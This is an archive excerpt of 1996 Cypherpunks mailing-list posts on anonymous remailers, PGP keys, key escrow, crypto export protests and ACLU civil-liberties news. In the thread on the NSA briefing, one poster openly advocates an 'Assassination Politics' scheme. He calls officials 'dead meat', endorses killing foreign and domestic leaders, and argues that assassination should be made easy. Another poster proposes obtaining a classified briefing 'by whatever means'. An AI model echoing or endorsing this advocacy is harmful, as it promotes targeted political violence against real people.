it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "nCognito Remailer <nobody@foo.bar.net>" <nobody@foo.bar.net>
Date: Mon, 27 May 1996 06:15:26 +0800
To: cypherpunks@toad.com
Subject: None
Message-ID: <199605261015.DAA14390@rigel.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


nCognito is back up and running, with a new address and new keys, etc 
etc. I apologize for any inconvenience this may (have) cause(d).

The new address is:   ncognito@cyberpass.net

The NEW pgp key is: 

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzGoBNkAAAEEALIv/aWoSIOOyabGttucdRynVguSqbXCwlEfEn0wn6tgyl2j
kNLos2aKp/Fdqo2ZxlsVbfhTLtgPa8WNO3uUML+4QOxsXVfy+z9arceEr6ABJUdY
s0Lv/vXFkKlOhHl/5at5RZRTjfjpm2t+G4TW4WT3L7i/LNtlMbGlo8DEMb2JAAUR
tDBuQ29nbml0byBSZW1haWxlciA8bmNvZ25pdG9AcmlnZWwuY3liZXJwYXNzLm5l
dD4=
=oUNh
-----END PGP PUBLIC KEY BLOCK-----


And the new mix key is:

ncognito ncognito@cyberpass.net 94e30b262408ac816144405faa62d623 2.0.2

-----Begin Mix Key-----
94e30b262408ac816144405faa62d623
258
AATm9nuuApioD58C7c2ksmQql9J42eOzJEvhGAAu
L9fxKmWl2H+gC5CVqeZciuJdfO04gK8IMiPa4R7h
sHCApMKvk/XjRh3CZzsRXK0LzvVKQLgJXHTPigJI
56cLjSG/mkxJ7xgGshEjhuu/sglAZk4qfizV0er9
iyr1F70+8rgVnQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----


Lot's of thank-you's to everyone that helped with getting the mailer back 
up and running so quickly.

...Oh, and next time someone remind me to keep my keys so we can avoid 
all this work in the future.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hendersn@zeta.org.au (Zed)
Date: Mon, 27 May 1996 06:38:00 +0800
To: cypherpunks@toad.com
Subject: Re: An alternative to remailer shutdowns
Message-ID: <199605251914.FAA28059@godzilla.zeta.org.au>
MIME-Version: 1.0
Content-Type: text/plain


>From:	IN%"unicorn@schloss.li"  "Black Unicorn" 24-MAY-1996 22:52:03.64
>
>>Remailers on the attack points (first in chain, last in chain) simply MUST
>>be disposable as tissue.  They must be run as anonymously as possible,
>>with as little connection to the ISP's assets as possible and immediately
>>disposable.  They must be easy to set up, runable without root and there
>>must be a much more efficent tracking mechanism.  (Mr. Levin has done a
>>terrific job, but even more needs to be done).

This is what I was groping for before, I think. I would like to set up an
anonymous remailer, but I have little to no idea how to go about it. I need
something that I can set up cheaply and easily on a machine that I don't
have root on, and that I could close down in a flash if there was a problem.

 I'm proposing a stop-gap measure that could take some of the heat off
genuine remailers - simple, easy-to-create remailers that do nothing except
anonymize the fullscale remailer that's being used. If you make it so that
Type-I and Type-II remailers can _only_ remail to these simple remailers as
well as other remailers, you've insulated them from the overt threat of
being caught as the last remailer in the chain. Hopefully the number of
full-scale remailers would then start increasing instead of decreasing if
there is less reason to threaten them.

As for traffic analysis uncovering the previous remailer in the chain: how
would discovering that the previous remailer in the chain was
utopia.hacktic.nl be any different from the message actually appearing from
utopia.hacktic.nl? The Church of Scientology doesn't have the resources to
do full-scale traffic analysis, so hacktic's role would never have been
discovered.  And what would you do if it turned out that the previous
remailer was middle-man@alpha.c2.org? Who do you prosecute?

>>It only takes ONE operator to get a tiny ($2500-$10,000) fine or judgement
>>and that will be the end of most of the mailers.  Poof.
>
>	What, pray tell, is the result of a judgement in which the person
>manifestedly doesn't have the money to pay? I couldn't pay a 10,000 dollar
>judgement; I don't have that much money. I would guess it'd be some form
>of attachment of income; this wouldn't get them much...

You either pay up as your income allows you, or you file for bankruptcy.
Neither option is likely to make other remailer operators feel good about
themselves.

  Zed(hendersn@zeta.org.au)
"Don't hate the media, become the media" - Jello Biafra
  PGP key on request





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@23kgroup.com (Paul J. Bell)
Date: Mon, 27 May 1996 06:31:42 +0800
To: cypherpunks@toad.com
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <9605261552.AA08814@23kgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


a good idea.  what we really need to do is to obtain, by whatever means
seems available, a copy of "the briefing", and to publish it, 
on the web/net, with detail anotations of each point. having
their story in public view would certainly take away a lot of it's power.
also, on the off chance that there were any errors in their version of 
the facts, it could make for an interesting q&a session when the next
receiptent didn't buy the pitch.

	-paul
ps.. no, i don't know, right off-hand, how to obtain such a copy, 
but if the employee manual that was making the rounds a few years was
what it porported to be, well, there's hope for this document to
see the light of day. (-:


> From cypherpunks-errors@toad.com Fri May 24 18:26:04 1996
> From: Alex Strasheim <cp@proust.suba.com>
> Subject: Re: [SCARE]:  "If you only knew what we know..."
> To:cypherpunks@toad.com
> Date: Fri, 24 May 1996 01:42:53 -0500 (CDT)
> X-Mailer: ELM [version 2.4 PL23]
> Content-Type> : > text> 
> Sender: owner-cypherpunks@toad.com
> Content-Length: 3634
> 
> > Patel is then likely to be given the *in camera* presentation
> > of The Deepest Darkest Secrets of Cryptography -- probably a modified
> > version of the classifed briefing the NSA has used with great success to
> > influence members of Congress. Legend has it that no one who ever got 'the
> > briefing' ever again opposed the agency." 
> 
> The last part reminds me of the Monty Python bit about the funniest joke
> in the world -- during the war Brittish soldiers would shout out a
> translated version they couldn't understand and the Germans would die
> laughing.  It seems pretty obvious that there are people who have
> withstood the NSA's siren song -- people in Congress and agencies like the
> Department of Commerce (who presumably have heard it) oppose the agency. 
> 
> I've felt for a long time that the division in venues has hurt us.  The
> other side pitches in secret to Congressmen and administration officials,
> while we preach to the converted and argue against straw men here on the
> net.  As a consequence they own official Washington and we own public
> opinion. 
> 
> The problem with this is that we don't get a chance to refute their 
> arguments.  I think we're right -- and to me believing we're right means 
> beliving that we can win a fair fight.  Logic and the facts ought to bear 
> us out.
> 
> One idea that I toyed around with but was too lazy to pursue was to have a
> public debate on the web.  A small group of people would be invited to
> participate -- maybe Dr. Denning on one side, and whoever else we could
> find to speak for the government.  We could pick an equal number of our
> best people to go up against them. 
> 
> The debate would proceed in rounds.  Each particpant could write his or
> her arguments for or against government restrictions on crypto, and the
> moderator would publish them all simultaneously.  Then there would a set 
> period of time for the participants to write responses -- maybe a couple 
> of days or a week.  Then another round of responses to the responses.  
> After that everyone could write closing arguments.
> 
> I think there are a couple of advantages to taking this sort of an
> approach rather than a more free form discussion on a mail list.  The
> first is that the other side would probably feel more welcome -- the lack
> of public support for their position and the net being what it is have
> combined to create a hostile environment for those who disagree with us. 
> The debate would prevent personal attacks (if we pick the right
> participants) and it would give the opposition some assurances that they
> won't get shouted down.  The idea is to create a level playing field --
> something that doesn't exist anywhere right now -- each side has it's own
> home court, but a neutral space doesn't seem to exist.
> 
> Another advantage would be that if people agree to particpate they'd
> probably take it seriously enough to follow through and answer criticisms
> of their arguments.  The idea of a formal discussion with a beginning, a
> middle, and an end might help keep things moving along.  Restricting
> things to a small number of participants who understand the technology and
> the history of crypto politics could also be helpful.
> 
> Finally, when the whole thing was over the web site would be a valuable 
> resource for anyone who wants to explore the issue.  Both sides would be 
> there nobody would feel that they had been bullied or manipulated into 
> believing one thing or another.
> 
> As I said above, I think we're right, and to me that means believing that
> we'd come out on top in a fair fight.  It seems to me that we ought to
> figure out how to set up a few of them and do whatever we can to get the
> other side to show up.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Subir Grewal <grewals@acf2.nyu.edu>
Date: Mon, 27 May 1996 06:28:24 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <199605260254.TAA14336@mail.pacifier.com>
Message-ID: <Pine.ULT.3.92.960526114819.28626A-100000@acf2.NYU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 25 May 1996, jim bell wrote:

:At 09:48 PM 5/25/96 -0400, Subir Grewal wrote:
:How "removed" do they have to be to be innocent, in your opinion?

If they didn't pull the trigger or give the order, they're innocent.
Making these criteria any laxer will cause problems as more and more
people are drawn into the category of offenders, pretty soon you're the
only victim, everyone else is out there to steal from you or assist in the
theft.

:Nuclear bomb design.  Done with funds stolen from taxpayers.  Done to
:protect the leadership of this country, not the public.

Pure mathematics as far as the people working at the lab were concerned.
You really think if the receptionist had died, it would have been
self-defense?  A couple of kids died in computer labs at other schools
where this happened, they were there feeding punched cards into the
machines.  Somehow that doesn't sound right to me.

:And isn't it immoral for George Bush, for instance, to choose a solution
:that results in the deaths of tens of thousands of comparatively innocent
:Iraqis, both during and after the Gulf war, rather than bumping off Saddam
:Hussein?  Think about it.  Exactly why does he do the former, rather than
:the latter?

And the Iranian leaders really think Clinton is an ungoldy kafir for
meeting Rushdie the apostate.  Why not kill him, after all various
Americans have suggested this is a valid tactic?  Your methods will be
used for ends you do not agree with.  From what I've learnt of the Gulf
war (I was reading most of the time, kept away from the TV), they did try
very hard to kill Sadaam Hussein, but got nowhere.  As is apparent,
political leaders value their own lives more than they do those of the
foot-soldiers.  Many among the foot-soldiers belive their lives would be
"brutish, nasty and short" without the mechanism of the state and are
willing to defend it and those who currently operate the machine.  Of
course George Bush I don't trust at all because the man was practically
glowing during "his war", anyone who enjoys a war, revels in it, is not
someone I admire, respect, or even talk to.  However, when you propose
that we kill this person, I'm not going to stand with you either.  Rest
assured, there will be many others waiting to take his place when he is
killed, and some of them will spell potato like the English feudal lords
did.

:>- From what I've gathered of AP, it attempts no radical reformation of "the
:>system", simply adds another set of costs for individuals within the govt.
:>to take into account.
:
:"Another set of costs"?  Yikes!  Read the essay, governments as we know them
:can't possibly survive post-AP.

Oh no, I think they will survive post AP.  The odds are quite high that
the people who are convinced to act on the AP philosophy will be branded
terrorists and become the objectives of many witch hunts the world over.
The IRA has a bad rep, though most sympathize with their cause.  And they
engender Thatchers, or others who are convinced of their "rightness" and
can only get to those posts by making public their convictions and gaining
some sympathy from the populace.  The fact that their targets, and know it
but still do not waver, makes them heroes in many eyes.

:Well, I disagree.  Until recently, public opinion was almost entirely
:manufactured.  It was a joint project of the government and the news media.

I too think Chomsky has perceptive vision when it comes to the media.

:Is there any significant likelihood that the people in power today will
:relinquish power absent a system such as AP?  I'm not optimistic about that.

No, noone "relinquishes" power.  They fight to keep it, but the struggle
does not always have to be violent, and it hurts our cause to instigate
violence when none has been used directly against us.

hostmaster@trill-home.com * Symbiant test coaching * Blue-Ribbon * Lynx 2.5
WHERE CAN THE MATTER BE

	Oh, dear, where can the matter be
	When it's converted to energy?
	There is a slight loss of parity.
	Johnny's so long at the fair.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Key Escrow = Conscription for the masses | 2048 bit via finger

iQB1AwUBMaiFnBwDKqi8Iu65AQGSngMAluS3YrESGUjk/e9DQxP5AIovFfaF8kcg
hF3WO7k7UvAhhcOq9FAHg2B7QnllEdPTohQqoxcC/F4RHZE7Ak1aHkhpxq3hopCO
1YOO3M3fGiz32TX8GnM9M61xiEUQ814b
=igsk
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "O. C. Winton WN1Z" <orrin@redshift.com>
Date: Mon, 27 May 1996 09:06:46 +0800
To: cypherpunks@toad.com
Subject: e-mail gateways to usenet
Message-ID: <31A8D4FD.352B@redshift.com>
MIME-Version: 1.0
Content-Type: text/plain


Wonder if anyone would consider posting a list of currently
functioning e-mail ways to post to usenet.  Would be useful for
people like me who often use libraries' access to internet, and
the libraries don't give newsgroup access.

orrin@redshift.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 27 May 1996 09:06:45 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: holographic remailing & the scientologists
In-Reply-To: <199605252119.OAA00566@netcom7.netcom.com>
Message-ID: <Pine.SUN.3.93.960526151115.27840B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 25 May 1996, Vladimir Z. Nuri wrote:

> frankly, I think this was a great idea that we could explore
> some more. in a sense, it stores data "holographically" over
> all kinds of different people's messages. imagine a system in which
> the scientology documents are stored in people's signatures,
> and someone writes software to go and recombine the documents
> based on finding signatures "out there".

This software already exists.  Take a look at Disperse/Collect at
http://www.eskimo.com/~weidai.  Disperse splits a file into n base64
encoded pieces where any k of them can be used to reconstruct the
original.  Collect will search through arbitrary collection of files (for
example the entire news spool) for these pieces and automatically
reconstruct everything that it finds. 

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 27 May 1996 09:31:42 +0800
To: "Vladimir Z. Nuri" <mab@research.att.com>
Subject: Re: "Key Escrow without Escrow Agents"
Message-ID: <199605262233.PAA16932@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:56 PM 5/25/96 -0700, Vladimir Z. Nuri wrote:

>
>I can see that you might create a code of law that determines
>what procedures that these "distributed key juries"  are supposed
>to follow. but like our legal system, the interpretation and
>application is ultimately left up to them.
>
>an interesting system, that is commendable for trying to
>find a compromise between two seemingly irreconcilable polarities
>(privacy and surveillance) but I doubt anyone in law enforcement
>(with the mindset, "I can't be stopped from doing my job as I
>see fit or criminals will get away") would go for it in the current form.

But as long as key-escrow is claimed to be "voluntary," then the police 
should be happy if it is used at all.  If they object that it is possible 
somebody won't agree that the person involved shouldn't have his data 
revealed, we can remind them that the jury system prevents conviction if not 
all of the jury agrees as to guilt.  This is no worse than having, say, 12 
key-escrow organizations and allowing any one to not reveal the correct key. 
 Naturally, it will be necessary to ensure that they can refuse without 
anyone else knowing who opted out...

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Mon, 27 May 1996 07:14:02 +0800
To: coderpunks@toad.com
Subject: net-based key archival
Message-ID: <199605262005.QAA14953@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


I've put a revised version of my "Key Escrow without Escrow Agents"
abstract in my ftp directory, in PostScript and Latex formats.
	ftp://research.att.com/dist/mab/netescrow.ps
	ftp://research.att.com/dist/mab/netescrow.tex

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 27 May 1996 10:50:54 +0800
To: Joined Trill <hostmaster@trill-home.com>
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <199605262337.QAA18778@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:23 PM 5/26/96 -0400, Subir Grewal wrote:
>On Sat, 25 May 1996, jim bell wrote:
>
>:At 09:48 PM 5/25/96 -0400, Subir Grewal wrote:
>:How "removed" do they have to be to be innocent, in your opinion?
>
>If they didn't pull the trigger or give the order, they're innocent.
>Making these criteria any laxer will cause problems as more and more
>people are drawn into the category of offenders, pretty soon you're the
>only victim, everyone else is out there to steal from you or assist in the
>theft.

Qualitatively, perhaps.  But quantitatively, no.  I think that blame for any 
given situation or government behavior will be distributed in a reasonably 
fair fashion, with those directly responsible for abuse becoming "dead meat" 
while those on the periphery only marginal targets.  Your generous 
interpretation of their guilt is certainly not binding on me.   And in any 
case the fact that the people involved will usually be able to resign will 
be a logical "out." 


>:Nuclear bomb design.  Done with funds stolen from taxpayers.  Done to
>:protect the leadership of this country, not the public.
>
>Pure mathematics as far as the people working at the lab were concerned.
>You really think if the receptionist had died, it would have been
>self-defense?  A couple of kids died in computer labs at other schools
>where this happened, they were there feeding punched cards into the
>machines.  Somehow that doesn't sound right to me.

I agree.  Which is why I'd much prefer a method to preferentially target a 
relatively smaller number of people, and I've invented (discovered?) just 
such a system.  Why not let it work?

>:And isn't it immoral for George Bush, for instance, to choose a solution
>:that results in the deaths of tens of thousands of comparatively innocent
>:Iraqis, both during and after the Gulf war, rather than bumping off Saddam
>:Hussein?  Think about it.  Exactly why does he do the former, rather than
>:the latter?
>
>And the Iranian leaders really think Clinton is an ungoldy kafir for
>meeting Rushdie the apostate.  Why not kill him, after all various
>Americans have suggested this is a valid tactic? 

Why not kill those Iranian leaders, using AP?  And if you're afraid they'll 
retaliate against "our" leaders, I see nothing wrong with that, either.  
It's the leaders who maintain the dispute.

> Your methods will be used for ends you do not agree with. 

Hey, I realized that long ago!  But I'm not under any illusion that this 
system can be molded to conform to my wishes alone:  If I could, I'd become 
a dictator and the cycle of tyranny would continue.  


> From what I've learnt of the Gulf
>war (I was reading most of the time, kept away from the TV), they did try
>very hard to kill Sadaam Hussein, but got nowhere. 

"Very hard"?  If they'd tried "very hard" they would have succeeded.  No, 
the various leadership groups controlling different countries have far more 
in common with each other than with the ordinary citizens.  They all are 
perfectly aware that if a precedent is established that killing the 
leadership is to be used to solve a dispute, eventually they'll all be dead. 
 Thus, they reject this solution like the plague.  The government only 
pretends to not be able to succeed at this task in order to assuage the 
natural desires of the public.


>As is apparent,
>political leaders value their own lives more than they do those of the
>foot-soldiers.  Many among the foot-soldiers belive their lives would be
>"brutish, nasty and short" without the mechanism of the state and are
>willing to defend it and those who currently operate the machine. 

They are misled, of course.

 >Of
>course George Bush I don't trust at all because the man was practically
>glowing during "his war", anyone who enjoys a war, revels in it, is not
>someone I admire, respect, or even talk to.  However, when you propose
>that we kill this person, I'm not going to stand with you either.  Rest
>assured, there will be many others waiting to take his place when he is
>killed, and some of them will spell potato like the English feudal lords
>did.

The only reason there might be "many others waiting to take his place" is 
that assassination is actually a rare event.  Make it easily accomplished, 
and who would want to take any politician's place?

>:"Another set of costs"?  Yikes!  Read the essay, governments as we know them
>:can't possibly survive post-AP.
>
>Oh no, I think they will survive post AP.  The odds are quite high that
>the people who are convinced to act on the AP philosophy will be branded
>terrorists and become the objectives of many witch hunts the world over.

Unless I capture the public's imagination, and they realize what kind of 
improvements it promises.  Or, at least they recognize that opposition by 
those in government is entirely self-serving.

>:Well, I disagree.  Until recently, public opinion was almost entirely
>:manufactured.  It was a joint project of the government and the news media.
>
>I too think Chomsky has perceptive vision when it comes to the media.

It doesn't take a great deal of perception to see this.  The media and the 
government are dependent on each other:  The media needs access to news, the 
government needs a pliable sounding board.  Chomsky has gotten smart on this 
subject, a little bit late in my estimation.  Chomsky's main advantage is 
that he's been a public figure for years, which means when HE spouts this 
stuff it's considered news.  When we talk about it, it's ignored.

>:Is there any significant likelihood that the people in power today will
>:relinquish power absent a system such as AP?  I'm not optimistic about that.
>
>No, noone "relinquishes" power.  They fight to keep it, but the struggle
>does not always have to be violent,

It isn't that it "has to" be violent.  Resignation is always an option.  
Problem is, they don't want to give up their positions of power.


> and it hurts our cause to instigate
>violence when none has been used directly against us.

That depends entirely on what your definition of instigating violence really 
is.  I happen to believe that the act of collecting taxes, involuntarily, IS 
the "instigation of violence" even if the victim gives up his assets without 
a fight, if there is the prospect of eventual violence should he refuse to 
cooperate.  Until you see this, you'll have a warped view of the propriety 
of AP, not to mention the libertarian non-initiation of force  principle.  
(NIOFP.)





Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Mon, 27 May 1996 11:00:51 +0800
To: cypherpunks@toad.com
Subject: Re: Children's Privacy Act
Message-ID: <2.2.32.19960527001900.006db418@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:15 PM 5/25/96, Chris Adams wrote:

>particularly if he plans to resell it. It does make me wonder whether you
could file a suit 
>against TRW for selling information about you, particularly since it could
affect you 
>adversely and there is no guaruntee it is accurate.

Thanks to existing laws, almost certainly not. If they satisfy the
government, credit agencies don't have to worry much about what harm they
might do to individuals.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Mon, 27 May 1996 09:30:27 +0800
To: cypherpunks@toad.com
Subject: Re: nCognito is Dead..
Message-ID: <2.2.16.19960526223322.258ff54a@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Long Live nCognito!
Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Mon, 27 May 1996 08:47:55 +0800
To: cypherpunks@toad.com
Subject: 407 Arms Traffickers in first month of training
Message-ID: <Pine.LNX.3.91.960526173013.1099A-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain




In the first month the Arms Trafficker Training Page has helped 407 people to
become Arms Traffickers.  Here are the stats: 


     International Arms Traffickers           407
     Public List of Known Arms Traffickers    147
     Letters to the president                  83
     Number of times page was read           2498 


So about one arms trafficker for every 6 times the page is read (some people
read the page more than once so the real ratio is better).  Kind of fun that
a web page can turn 1 out of 6 people into criminals. 

Thanks for your support both as arms traffickers and for linking to this
page. It is off to a good start.  For anyone who had missed it, the URL is: 

   http://online.offshore.com.ai/arms-trafficker/

  --  Vince Cate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 27 May 1996 09:10:06 +0800
To: remailer-operators@c2.org
Subject: Re: Mixmaster version usable with POP?
In-Reply-To: <adcd6b4709021004cd63@[206.170.115.3]>
Message-ID: <Pine.LNX.3.93.960526181444.413A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 25 May 1996, Lance Cottrell wrote:

> While there is not an "out of the box" version of Mixmaster like this, it
> would be easy to do. The UNIX POP clients I have seen just dump the mail
> into a mbox formated file. A simple script could be written to yank out the
> messages one at a time, and feed them to Mixmaster (or mail-in or
> whatever). In fact, the more recent versions of Mixmaster should be able to
> swallow the file whole, pulling out the mixmaster messages itself. This
> modification was made to support "subway" remailers, which want to send a
> fixed number of messages (in one email) each time period.

On Linux this works:
popclient -3 -c POPHOSTNAME | formail -s mixmaster -R >> $MAIL

It will work on any system that has formail and popclient on it.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMajYyLZc+sv5siulAQGX9QP7Bb5Lm/zgf3r3R5r1pmvGRaCA0T+DpnAK
pQepAEsjU2Dt2U1/Hj5EZ846xmAg5oI3Dc7T42vGr+iW6Frt6e9TXq2I/xzal6NJ
h+P4o5poU7cX7xVWoQv08Z5zcYAbJfwHxg6yJbIOKYyb8EbDB2m+sFCeM1M6g63O
8740njLFiRk=
=WMmU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 27 May 1996 09:33:11 +0800
To: Ben Holiday <ncognito@gate.net>
Subject: Re: nCognito is Dead..
In-Reply-To: <Pine.A32.3.93.960525155235.39848B-100000@navajo.gate.net>
Message-ID: <Pine.LNX.3.93.960526182121.413B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 25 May 1996, Ben Holiday wrote:

> 
> Well I have been given my notice to terminate the remailers running at
> this account. Make a note to remove ncognito from your type2.list, and
> those running pingers, please remove nCognito as soon as its convenient.
> 
> Below i've quoted verbatim the request to shutdown that I received. PLEASE
> note that there is no mention of FBI, NSA, or Co$. :)  The request is the
> result of some errors that mix generated while I was makeing changes, that
> resulted in the administration at gate.net noticing the remailer. Frankly,
> I cant blame them given the current legal climate.
> 
> Although I would have liked to continute operating the remailers, I must
> admit that I'll sleep better at night now that its gone. 
> 
> BTW: Does anyone know of a few ISP's that accept cash and dont require
> verification of your identity? :)

C2 (http://www.c2.org) and I think Cyberpass (http://www.cyberpass.net) both
allow anonymous accounts.  There was also a list of offshore ISP's posted a
while ago.  I am looking into getting an account on one of these myself.

P.S. For you non-UNIX types, I am currently in the process of writing a program
that will automatically install an anonymous remailer on a UNIX account.  It
should be ready for release in the next couple of days.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMajak7Zc+sv5siulAQH5UAP/ZOC2OePpoyJw3H2UE/Y8l2emjABjGEbo
/7IYaEjrTy0Dd4jpzITfO6/Uba/H870BUYuO9+iv3Dx2kjwiPRVV2EK/cNGQlFGF
xHCPGbnjbDkJatX/CclN9WgCuqgBp+o03T410y4Oh60jyUZ5KBIWmKNNi5B5SKWl
Gjwo+DAzTlk=
=tLcZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Witanek <bwitanek@igc.apc.org>
Date: Mon, 27 May 1996 22:39:33 +0800
To: Recipients of pol-abuse <pol-abuse@igc.apc.org>
Subject: ACLU: Secret Intelligence Budget
Message-ID: <APC&1'0'a9f987ac'670@igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


Posted: sspnj@exit109.com
ACLU News 05-23-96:
*House Votes to Keep Intelligence Budget Secret*

In a blow to open government, the House of Representatives has
rejected a move by the Clinton Administration to -- for the first
time -- make public the overall national intelligence budget, The
Washington Post reported today.

The rejection came on a vote of 248 to 176 on an amendment to a
bill that would fund the CIA and 11 other, mostly Pentagon-based,
intelligence agencies.

The ACLU had supported the amendment, saying that "taxpayers have
a right to know what their tax dollars support."

But the Post said that House Intelligence Chairman Larry Combest,
R-TX, opposed disclosure in committee and led the opposition on the
floor yesterday. He said making the overall figure public
inevitably would lead to disclosure of individual intelligence
accounts, which, he said, could harm clandestine sources and
methods.

ACLU Legislative Counsel Gregory T. Nojeim disagreed. "Disclosure
of the bottom-line figure is the absolute minimum that Congress
should do to make the intelligence agencies accountable to the
American public," he said. "All of these intelligence agencies have
acknowledged that any Cold War justification for keeping the total
budget secret has passed." --------------------------------------
--------------------------                 *State Police Search
Blacks More Than Whites*

PERRYVILLE, Md. -- Black drivers are being stopped and searched for
drugs at least four times more often than whites by a special
Maryland state police squad that patrols stretches of Interstate
95, the East Coast's main north-south artery, the Associated Press
reports today.

This finding from an Associated Press computer analysis of car
searches raises questions of whether troopers are following their
own written training procedures and complying with a court ruling
that specifically bars them from using racial profiles to determine
likely drug couriers.

More than 75 percent of all drivers whose cars were searched by the
special drug squad through the first nine months of last year were
black, the AP said.

State police steadfastly denied using racial profiles, which in the
past typically targeted young minority men driving late-model cars
and carrying pagers or wearing gold jewelry. The Maryland police
maintained that black motorists were searched for reasons other
than race and that the preponderance of blacks searched amounted
to coincidence.

Maryland state police are forbidden to use racial profiles in
traffic stops under terms of a legal settlement reached in 1994
with Robert Wilkins, a black Washington lawyer searched for drugs
as he drove home from a funeral in 1992.

The settlement also requires troopers to provide records on all
1995-97 highway searches to the American Civil Liberties Union of
Maryland. The AP examined the records for January through September
1995.

The AP said that it asked the ACLU for the early reports after a
Philadelphia couple filed a discrimination suit in January against
three troopers.

Charles Carter, now 66, and his wife, Etta, 65, were driving north
on I-95 in a rented minivan on July 12, 1994, their 40th wedding
anniversary, when troopers pulled them over and searched the van
for drugs. The couple claim they were searched because they are
black.

``This entire incident was and continues to be deeply humiliating
for my wife and myself,'' Carter said in an affidavit. ``It is
inconceivable to us that, as American citizens of the late
twentieth century, we would be treated in this manner by officers
of the law.''

The ACLU said the data may eventually prove a pattern of
discrimination. If the organization can show in court that blacks
are being searched in inappropriately high numbers, it may consider
a class-action lawsuit, said Debbie Jeon, an ACLU attorney.

----------------------------------------------------------------
ONLINE RESOURCES FROM THE ACLU NATIONAL OFFICE
----------------------------------------------------------------
ACLU Freedom Network Web Page:  http://www.aclu.org.  
America Online users should check out our live chats, auditorium
events, *very* active message boards, and complete news on civil
liberties, at keyword ACLU.

----------------------------------------------------------------
ACLU Newsfeed
American Civil Liberties Union National Office
